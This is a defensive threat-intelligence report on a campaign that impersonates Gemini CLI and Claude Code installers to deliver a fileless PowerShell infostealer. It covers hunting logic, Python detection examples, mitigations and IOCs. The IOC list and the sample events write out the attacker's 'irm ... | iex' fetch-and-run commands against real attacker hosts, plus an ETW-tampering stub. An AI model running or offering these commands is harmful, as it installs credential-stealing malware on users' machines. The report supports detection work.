9 min read · high

SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

A financially motivated eCrime campaign is leveraging SEO poisoning to impersonate AI coding assistants like Gemini CLI and Claude Code, tricking developers into executing a fileless PowerShell infostealer. The malware executes entirely in memory, disables Windows telemetry (ETW and AMSI), and harvests sensitive enterprise credentials, session tokens, and files before exfiltrating them to attacker-controlled infrastructure.

Sens: Immediate · Conf: high · Analyzed: 2026-05-21

Authors: EclecticIQ analysts

Actors: Financially motivated eCrime actors

Source: EclecticIQ

IOCs · 60

Detection / Hunter

What Happened

Cybercriminals are creating fake websites that look like official download pages for popular AI tools like Google's Gemini and Anthropic's Claude. When developers try to install these tools, they are tricked into copying and pasting a malicious command that secretly installs data-stealing software. This matters because developers often have access to sensitive company systems, and stealing their passwords or session tokens can give attackers deep access to a company's network. Organizations should train developers to verify installation sources and restrict the execution of unverified scripts on their computers.

Key Takeaways

  • Financially motivated actors are using SEO poisoning to impersonate AI tools like Gemini CLI and Claude Code.
  • The campaign targets developer workstations to steal credentials, OAuth tokens, and source code access.
  • The infection relies on victims pasting a malicious PowerShell one-liner that executes a fileless infostealer in memory.
  • The malware disables ETW and AMSI to evade detection while simultaneously installing the legitimate tool to avoid suspicion.
  • The infrastructure uses typosquatted domains and bulletproof hosting to sustain operations.

Affected Systems

  • Windows
  • Developer Workstations
  • Google Chrome
  • Microsoft Edge
  • Brave
  • Mozilla Firefox
  • Slack
  • Microsoft Teams
  • Discord
  • Mattermost
  • Zoom
  • Telegram
  • WinSCP
  • PuTTY
  • OpenVPN

Attack Chain

The attack begins with SEO poisoning that directs developers searching for AI tools to fake installation pages. These pages instruct the user to copy and paste a PowerShell one-liner of the 'irm <url> | iex' form, which downloads and executes a fileless infostealer in memory while also installing the legitimate tool, so the victim sees the result they expected. The malware disables ETW and AMSI, then compiles embedded C# types with Add-Type and uses P/Invoke to extract credentials, session cookies, and sensitive files from browsers, collaboration apps, and remote access tools. Finally, the stolen data is exfiltrated over HTTPS to a C2 server, which can also issue follow-on commands for arbitrary remote code execution.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article provides behavioral detection logic and hunting hypotheses based on command-line telemetry and network patterns, but does not include ready-to-use detection rules.

Detection Engineering Assessment

  • EDR Visibility: Medium. The payload executes entirely in memory and tampers with ETW and AMSI from inside the PowerShell process. Patching PSEtwLogProvider.m_enabled silences PowerShell's own script block and module logging (Event ID 4104) and the AMSI bypass blinds scanning of later script content, but neither touches kernel-sourced telemetry: process creation (4688 / Sysmon 1), network connections (Sysmon 3) and the initial command line remain highly visible.
  • Network Visibility: Medium. C2 traffic uses HTTPS, so payload content is encrypted, but the beaconing pattern to the /take, /process and /validate URI paths (visible only at a TLS-inspecting proxy) and connections to newly registered .co.com lookalike domains (visible in DNS and TLS SNI) can be detected.
  • Detection Difficulty: Moderate. In-memory execution and telemetry tampering raise the bar after execution starts, but the initial access vector relies on a highly recognizable paste-and-execute pattern ('irm ... | iex') that is straightforward to detect at process creation.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • PowerShell Operational Logs (Event ID 4104, script block logging)
  • Network Connection Logs (Sysmon Event ID 3)

Hunting Hypotheses

Columns: Hypothesis | Telemetry | ATT&CK Stage | FP Risk

  • Hunt for process command lines containing 'Invoke-RestMethod', 'Invoke-Expression', or their aliases 'irm' and 'iex' chained together, indicating potential fileless execution. | Process Creation Logs | Execution | Medium
  • Look for powershell.exe spawned with '-WindowStyle Hidden' or instantiated via 'Shell.Application.ShellExecute' with window style 0. | Process Creation Logs | Execution | Low
  • Search for PowerShell sessions loading types via 'Add-Type' followed by P/Invoke calls to 'advapi32.dll!CredEnumerate'. | PowerShell Operational Logs | Credential Access | Low
  • Monitor for outbound HTTP/HTTPS connections to newly registered '.co.com' domains and to lookalike domains mimicking developer tools (e.g., *-setup.com, *-setup.co.com, *-install.co.com). | Network Connection Logs | Command and Control | Low
  • Correlate powershell.exe spawning from explorer.exe or cmd.exe with outbound network connections occurring within five seconds. | Process Creation and Network Logs | Execution | Medium
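As an added example (not part of the EclecticIQ report or any detection content it ships), the five hypotheses above, plus the PSEtwLogProvider indicator listed under Key Behavioral Indicators, implemented as rules over constructed Sysmon and PowerShell events. The event schema (id, ts, host, pid, image, parent, cmd, dst, script) is an assumed normalized form rather than raw Windows event XML, and the sample events are invented to exercise each rule; none of them come from the campaign.

```python
"""Run the hunting hypotheses from the table above over sample telemetry."""
import ntpath
import re
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Sysmon ID 1 = process
# creation, Sysmon ID 3 = network connection, 4104 = PowerShell script block.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"id": 1, "ts": "2026-05-21T10:00:00", "host": "dev01", "pid": 4120, "image": PS,
     "parent": r"C:\Windows\explorer.exe",
     "cmd": 'powershell.exe -WindowStyle Hidden -c "irm https://community.chocolatey.net/install.ps1|iex"'},
    # Stand-in for the ETW patch: only the reflection lookup, not a working bypass.
    {"id": 4104, "ts": "2026-05-21T10:00:02", "host": "dev01", "pid": 4120,
     "script": "$t = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider'); "
               "$t.GetField('m_enabled', 'NonPublic,Instance')"},
    {"id": 3, "ts": "2026-05-21T10:00:03", "host": "dev01", "pid": 4120, "image": PS,
     "dst": "geninicli.co.com", "port": 443},
    {"id": 4104, "ts": "2026-05-21T10:00:04", "host": "dev01", "pid": 4120,
     "script": "Add-Type -TypeDefinition $src\n"
               "[Native.Advapi32]::CredEnumerate($null, 0, [ref]$count, [ref]$creds)"},
    # Benign build agent: scheduled script, no pipe to iex, network 30 s later.
    {"id": 1, "ts": "2026-05-21T11:00:00", "host": "build02", "pid": 900, "image": PS,
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\ci\backup.ps1"},
    {"id": 3, "ts": "2026-05-21T11:00:30", "host": "build02", "pid": 900, "image": PS,
     "dst": "artifacts.corp.example", "port": 443},
]

# H1-H5 are the rows of the table above; "ETW provider patch" is the
# behavioural indicator "PowerShell patching PSEtwLogProvider.m_enabled".
IRM_IEX = re.compile(r"\b(?:irm|invoke-restmethod)\b[^|]*\|\s*(?:iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b|ShellExecute\([^)]*,\s*0\s*\)", re.I)
LOOKALIKE = re.compile(r"(?:\.co\.com|-setup\.(?:co\.)?com|-install\.co\.com)$", re.I)
SPAWN_WINDOW = timedelta(seconds=5)   # H5: network connection within five seconds


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()


def hunt(events):
    """Return a list of {hypothesis, host, pid, detail} findings."""
    findings = []

    def hit(hypothesis, e, detail):
        findings.append({"hypothesis": hypothesis, "host": e["host"],
                         "pid": e["pid"], "detail": detail})

    spawned = {}  # (host, pid) -> start time of powershell.exe launched by explorer/cmd
    for e in sorted(events, key=lambda x: x["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        key = (e["host"], e["pid"])
        if e["id"] == 1 and _base(e["image"]) == "powershell.exe":
            if IRM_IEX.search(e["cmd"]):
                hit("H1 irm|iex chain", e, e["cmd"])
            if HIDDEN.search(e["cmd"]):
                hit("H2 hidden window", e, e["cmd"])
            if _base(e["parent"]) in ("explorer.exe", "cmd.exe"):
                spawned[key] = ts
        elif e["id"] == 4104:
            s = e["script"]
            if "Add-Type" in s and "CredEnumerate" in s:
                hit("H3 Add-Type + CredEnumerate", e, s[:80])
            if HIDDEN.search(s):
                hit("H2 hidden window", e, s[:80])
            if "PSEtwLogProvider" in s and "m_enabled" in s:
                hit("ETW provider patch", e, s[:80])
        elif e["id"] == 3:
            if LOOKALIKE.search(e["dst"]):
                hit("H4 lookalike domain", e, e["dst"])
            start = spawned.get(key)
            if start is not None and timedelta(0) <= ts - start <= SPAWN_WINDOW:
                secs = int((ts - start).total_seconds())
                hit("H5 spawn->network within 5s", e, f"{e['dst']} {secs}s after start")
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f['host']:8} {f['hypothesis']:32} {f['detail']}")
```

The script block that patches PSEtwLogProvider is itself logged before the patch takes effect, so the "ETW provider patch" rule fires on real hosts even though later 4104 events may be missing; a PowerShell process whose 4104 stream goes silent right after such a block is a signal in its own right. The build02 events show the main false-positive source for H5 (cmd.exe launching a scheduled script) being excluded by the five-second window.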

Control Gaps

  • Lack of PowerShell Constrained Language Mode (CLM)
  • Permissive clipboard access in browsers
  • Absence of Mark-of-the-Web (MOTW) enforcement for scripts

Key Behavioral Indicators

  • powershell.exe spawning with hidden window styles
  • irm | iex command line patterns
  • PowerShell patching PSEtwLogProvider.m_enabled
  • C2 beaconing to /take, /process, and /validate endpoints
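The C2 beaconing indicator above, worked as an added example that is not part of the EclecticIQ report: given proxy logs that expose the URI path (which requires TLS inspection, since the C2 uses HTTPS), flag each (source, destination host) pair that issues a /take request before its first /process request, and check whether the /process requests arrive at a regular interval. The log format (timestamp, source, method, host, path, status) and the sample lines are constructed, and the 20% jitter tolerance is my threshold, not a figure from the report.

```python
"""Flag hosts whose HTTP(S) traffic follows the /take -> /process -> /validate
C2 pattern described above, and test whether /process requests are periodic."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines (not real traffic): time src method host path status.
# 10.1.2.51 and 10.1.2.77 are benign and show why /take alone must not alert.
PROXY_LOG = """\
2026-05-21T10:00:05Z 10.1.2.34 POST events.msft23.com /take 200
2026-05-21T10:00:06Z 10.1.2.34 POST events.msft23.com /process 200
2026-05-21T10:01:06Z 10.1.2.34 POST events.msft23.com /process 200
2026-05-21T10:02:07Z 10.1.2.34 POST events.msft23.com /process 200
2026-05-21T10:02:08Z 10.1.2.34 POST events.msft23.com /validate 200
2026-05-21T10:03:06Z 10.1.2.34 POST events.msft23.com /process 200
2026-05-21T10:00:10Z 10.1.2.51 GET api.corp.example /take 200
2026-05-21T10:05:10Z 10.1.2.51 GET api.corp.example /items 200
2026-05-21T10:00:11Z 10.1.2.77 GET cdn.corp.example /assets/app.js 200
"""

C2_PATHS = ("/take", "/process", "/validate")
MAX_CV = 0.2   # assumed jitter tolerance: pstdev/mean of the /process gaps


def parse(log):
    """Yield (timestamp, src, host, path) tuples; query strings are dropped."""
    rows = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, _method, host, path, _status = line.split()
        rows.append((datetime.fromisoformat(ts.replace("Z", "+00:00")),
                     src, host, path.split("?", 1)[0]))
    return rows


def analyze(log):
    """Return one alert dict per (src, host) pair matching the C2 sequence."""
    by_pair = defaultdict(list)
    for ts, src, host, path in parse(log):
        by_pair[(src, host)].append((ts, path))

    alerts = []
    for (src, host), reqs in by_pair.items():
        reqs.sort()
        seen = [p for _, p in reqs if p in C2_PATHS]
        # Registration (/take) must precede the first beacon (/process); both are
        # generic path names, so the ordering is what keeps false positives down.
        if "/take" not in seen or "/process" not in seen:
            continue
        if seen.index("/take") > seen.index("/process"):
            continue
        times = [ts for ts, p in reqs if p == "/process"]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps) if gaps else 0.0
        periodic = (len(gaps) >= 2 and mean_gap > 0
                    and statistics.pstdev(gaps) / mean_gap <= MAX_CV)
        alerts.append({"src": src, "host": host, "paths": sorted(set(seen)),
                       "process_count": len(times),
                       "mean_gap_s": round(mean_gap, 1) if gaps else None,
                       "periodic": periodic})
    return alerts


if __name__ == "__main__":
    for a in analyze(PROXY_LOG):
        print(a)
```

Without path visibility the same logic degrades to counting connections per (source, SNI/DNS name) to newly registered domains, which is what the Network Visibility note above means by relying on the .co.com domains rather than the URI paths.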

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider blocking network traffic to the identified C2 domains and IPs. Prefer domain-based blocks: a listed IP may front many unrelated sites (shared CDN or reverse-proxy ranges), so confirm ownership before adding an IP block to avoid collateral outages.
  • Evaluate whether to reset credentials and revoke active session tokens (browser cookies, OAuth refresh tokens, and sessions for the collaboration and remote-access tools listed under Affected Systems) for users who may have executed the malicious commands. A password reset alone leaves already-stolen session tokens valid until they expire or are revoked.

Infrastructure Hardening

  • Consider enforcing PowerShell Constrained Language Mode (CLM) on developer workstations via WDAC or AppLocker. CLM does not stop 'irm | iex' itself, but it blocks the Add-Type compilation and the .NET reflection the payload relies on for credential theft and ETW patching.
  • Evaluate deploying AppLocker or WDAC rules to prevent powershell.exe from executing scripts downloaded from the internet based on Mark-of-the-Web (MOTW). Note that the 'irm | iex' one-liner never writes the script to disk, so MOTW is never attached to it; MOTW-based script rules help only against dropped-file variants, while CLM and command-line monitoring cover the fileless path.
  • If supported by your identity provider, enforce short-lived OAuth tokens with mandatory refresh and conditional access for developer accounts.

User Protection

  • Consider implementing FIDO2 hardware security keys to minimize the impact of stolen credentials and session tokens.
  • Evaluate configuring browser policies to disable clipboard write access for untrusted sites to mitigate paste-and-execute lures.

Security Awareness

  • Consider updating developer security training to highlight the risks of copying and pasting installation commands directly from search results.
  • Evaluate rolling out awareness communications specifically targeting the impersonation of AI coding assistants and package managers.

MITRE ATT&CK Mapping

  • T1189 - Drive-by Compromise
  • T1608.006 - Stage Capabilities: SEO Poisoning
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1204.001 - User Execution: Malicious Link
  • T1204.002 - User Execution: Malicious File
  • T1027 - Obfuscated Files or Information
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1562.006 - Impair Defenses: Indicator Blocking
  • T1497.001 - Virtualization/Sandbox Evasion: System Checks
  • T1218 - System Binary Proxy Execution
  • T1057 - Process Discovery
  • T1083 - File and Directory Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1555.004 - Credentials from Windows Credential Manager
  • T1539 - Steal Web Session Cookie
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1552.002 - Unsecured Credentials: Credentials in Registry
  • T1005 - Data from Local System
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1573 - Encrypted Channel
  • T1105 - Ingress Tool Transfer
  • T1041 - Exfiltration Over C2 Channel

Additional IOCs

  • IPs:
    • 188[.]114[.]97[.]3 - IP address resolving to claude-setup.com hosting install.ps1.
    • 5[.]8[.]18[.]88 - IP address resolving to gemini-setup.com hosting install.ps1.
  • Domains:
    • api[.]bio9438[.]com - Attacker-controlled domain identified via passive DNS.
    • claudecode-install[.]co[.]com - Attacker-controlled domain impersonating Claude Code.
    • openclow[.]co[.]com - Attacker-controlled domain identified via passive DNS.
    • geninicli[.]co[.]com - Attacker-controlled domain impersonating Gemini CLI.
    • keepassxc[.]us[.]org - Attacker-controlled domain impersonating KeePassXC.
    • claude-code[.]co[.]com - Attacker-controlled domain impersonating Claude Code.
    • chocolatey[.]net - Attacker-controlled domain impersonating Chocolatey.
    • chocolatey-setup[.]co[.]com - Attacker-controlled domain impersonating Chocolatey.
    • get-monero[.]co[.]uk - Attacker-controlled domain impersonating Monero.
    • getmonero[.]us[.]com - Attacker-controlled domain impersonating Monero.
    • metrics[.]msft17[.]com - Attacker-controlled domain identified via passive DNS.
    • keepassxc[.]us[.]com - Attacker-controlled domain impersonating KeePassXC.
    • olive3451[.]com - Attacker-controlled domain identified via passive DNS.
    • chocolatey-download[.]co[.]com - Attacker-controlled domain impersonating Chocolatey.
    • chocolatey[.]co[.]com - Attacker-controlled domain impersonating Chocolatey.
    • nodejs-setup[.]co[.]com - Attacker-controlled domain impersonating Node.js.
    • community[.]chocolatey[.]net - Spoofed domain impersonating official Chocolatey infrastructure.
  • URLs:
    • hxxps://events[.]msft23[.]com/take - C2 endpoint used to request initial configuration or staging data.
    • hxxps://events[.]msft23[.]com/process - Main C2 beacon endpoint for uploading exfiltrated data and receiving tasks.
    • hxxps://events[.]msft23[.]com/validate - C2 endpoint used to confirm task execution or report status.
    • hxxps://claude-setup[.]com/install.ps1 - URL hosting the infostealer downloader script.
    • hxxps://gemini-setup[.]com/install.ps1 - URL hosting the infostealer downloader script.
  • File Hashes:
    • 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333 (SHA256) - Infostealer payload hash.
    • 89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d (SHA256) - Infostealer payload hash.
    • be2ff065a232a3a6f187f9fb03a6c1b368dff3d2ba0966777b1f5503aa5ecd16 (SHA256) - Infostealer payload hash.
    • a1c5e1d9bdc1a931c11ac6fdfdff1fbc69ff88521cf443cb174f9720a05fe72d (SHA256) - Infostealer payload hash.
    • bb78f024c4d8b5a6a128aacb498acad025a234a6b25fde36ff2e14601134555f (SHA256) - Infostealer payload hash.
    • a6525b37b0cc5339df375e17a0c10772b50c9d425001b0c3a9dada995c7f62dd (SHA256) - Infostealer payload hash.
    • b37ee243518221017bab0eb4b54b5431571cc21e54113698ce49a89b89993754 (SHA256) - Infostealer payload hash.
    • aa350580ae5ea46544ffa15c324ab4225dff0dcc5842ac5ca8e2dc4018e5ffad (SHA256) - Infostealer payload hash.
    • 65e1a542bb7d995cc4aa6c71191da125f14f99ca03da7266f5b071440d6d229a (SHA256) - Infostealer payload hash.
    • 64d2a9a49e27d89f1b3489d7db29c3a3a12b4b090f59c24b694c239cb55db262 (SHA256) - Infostealer payload hash.
    • 2d7a94e4a0fedcf31cdd43b06222add9d1888fecb2c5488afc658d08c3f40116 (SHA256) - Infostealer payload hash.
    • 5c6a2c73f59fd8defbf118f87e5c88ba62e3067f8e8c0ed104f3f188fa0d959d (SHA256) - Infostealer payload hash.
    • de34f2f93b74e049a08074c779a863a87a85a403594b8e220b1fba15112e6386 (SHA256) - Infostealer payload hash.
    • 0e8c45d847f57095d9879c0da764ab02431db4d5d85f50c4fd5ba38353b79eed (SHA256) - Infostealer payload hash.
    • dfd21a363f4994794f821d76ca61c834882a51b5c6f7b95627b70789462149e3 (SHA256) - Infostealer payload hash.
    • a31ae1eef3261c36b465255e624fb7ac5899bf2a9823564ba792fac8346723aa (SHA256) - Infostealer payload hash.
    • 1439d30ebeac3a6ccb9545acaa350783a83cc08746cb575e59ddb0efc77d412a (SHA256) - Infostealer payload hash.
    • 7c2a9ad5fcf489d1844f51830242f6dd9dfc203be6de3ceb07a4f6dd21c9f1a3 (SHA256) - Infostealer payload hash.
    • 80ffc86673bd8c8bd5862bbe961323a822b23c94df48c685162c571445552faa (SHA256) - Infostealer payload hash.
    • c416052c8ac6bfb78b7f0c46c568c528ead33501149661f1d9ecb1861269f8fa (SHA256) - Infostealer payload hash.
    • efbf87447d93f4232b1169920f75c2066d19863ebc28fb2d2662353dc4ef61d8 (SHA256) - Infostealer payload hash.
    • 2d9ecc9321994558d0cc0e9d3fa9fdf600bacfe8758976d34f26f89c33bd5007 (SHA256) - Infostealer payload hash.
    • ae9bc11adb457930d402844bd3bf3af8ea7c13fdb7ea269fbe73877b18af1ca8 (SHA256) - Infostealer payload hash.
    • c213ce07b5791abd334ff749b5f05ecc6b40772d35ef4388b5f576bc3e619765 (SHA256) - Infostealer payload hash.
    • 27e17661f5573f63b65e3a5cfe5bdca75acdc1911441b032781f7ebe125d9194 (SHA256) - Infostealer payload hash.
    • ae8f70dad97fedecd707977ca22fd6f656c64c0dac96e03f0f4a6c04d0693f59 (SHA256) - Infostealer payload hash.
    • c47610c9df3fb101b0e99f2ac12589db653464edf12cebaa2c67fd33fc7715f3 (SHA256) - Infostealer payload hash.
    • 5071921cb1ca369fe8f7af522a00373c8c85e4357f7ea1879d2cb4ae791797d6 (SHA256) - Infostealer payload hash.
  • Registry Keys:
    • HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\ - Targeted by infostealer to extract stored WinSCP session passwords.
    • HKCU:\Software\SimonTatham\PuTTY\Sessions - Targeted by infostealer to extract saved PuTTY session configurations.
  • Command Lines:
    • Purpose: Downloads and executes the fileless infostealer payload in memory. | Tools: PowerShell | Stage: Execution | irm events.msft23.com | iex
    • Purpose: Fake Node.js installation command that downloads the infostealer. | Tools: PowerShell | Stage: Execution | powershell.exe -c "irm https://community.chocolatey.net/install.ps1|iex"
    • Purpose: Installs the legitimate Gemini CLI tool to mask the malicious activity. | Tools: npm | Stage: Defense Evasion | npm install -g @google/gemini-cli
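The IOC list above is published defanged ('[.]', 'hxxps'), which is the right way to print it but not a form a resolver or proxy can consume. As an added example (not part of the EclecticIQ report), a small parser for that "value - description" format that refangs each value, classifies it, pulls hostnames out of the URLs, and emits a hosts-file style blocklist. The IOC_TEXT lines are copied from the list above (a subset); everything else is illustrative.

```python
"""Parse the defanged IOC lines in the format used above into a blocklist."""
import re
from urllib.parse import urlsplit

# A subset of the IOC list above, kept defanged exactly as published.
IOC_TEXT = r"""
IPs:
  • 188[.]114[.]97[.]3 - IP address resolving to claude-setup.com hosting install.ps1.
Domains:
  • claudecode-install[.]co[.]com - Attacker-controlled domain impersonating Claude Code.
  • community[.]chocolatey[.]net - Spoofed domain impersonating official Chocolatey infrastructure.
URLs:
  • hxxps://events[.]msft23[.]com/take - C2 endpoint used to request initial configuration or staging data.
  • hxxps://claude-setup[.]com/install.ps1 - URL hosting the infostealer downloader script.
File Hashes:
  • 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333 (SHA256) - Infostealer payload hash.
Registry Keys:
  • HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\ - Targeted by infostealer to extract stored WinSCP session passwords.
"""

SHA256 = re.compile(r"^[0-9a-fA-F]{64}$")
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)


def refang(value):
    """Undo the '[.]', '(.)' and 'hxxp' defanging used in the list above."""
    value = value.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", value, flags=re.I)


def parse_iocs(text):
    """Return {"ipv4": [...], "domain": [...], "url": [...], "sha256": [...],
    "registry": [...], "unclassified": [...]} with refanged, de-duplicated values."""
    out = {k: set() for k in ("ipv4", "domain", "url", "sha256", "registry", "unclassified")}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line or line.endswith(":"):
            continue                      # blank line or section header such as "Domains:"
        value = line.split(" - ", 1)[0].strip()   # drop the " - description" tail
        value = value.split(" (", 1)[0].strip()   # drop the "(SHA256)" annotation
        value = refang(value)
        if SHA256.match(value):
            out["sha256"].add(value.lower())
        elif IPV4.match(value):
            out["ipv4"].add(value)
        elif "://" in value:
            out["url"].add(value)
            host = urlsplit(value).hostname
            if host:
                out["domain"].add(host.lower())   # URL hosts are blockable on their own
        elif value.upper().startswith(("HKCU", "HKLM", "HKEY_")):
            out["registry"].add(value)
        elif DOMAIN.match(value):
            out["domain"].add(value.lower())
        else:
            out["unclassified"].add(value)       # surface anything the rules missed
    return {k: sorted(v) for k, v in out.items()}


def hosts_blocklist(iocs):
    """One hosts-file line per domain; swap in RPZ or proxy syntax as needed."""
    return [f"0.0.0.0 {d}" for d in iocs["domain"]]


if __name__ == "__main__":
    parsed = parse_iocs(IOC_TEXT)
    for kind, values in parsed.items():
        print(kind, values)
    print("\n".join(hosts_blocklist(parsed)))
```

Registry keys are kept separately because they are host-side hunt targets (what the stealer reads), not network blocks; the "unclassified" bucket should be empty after a run, and anything in it means the format drifted and the parser needs a look before its output is trusted.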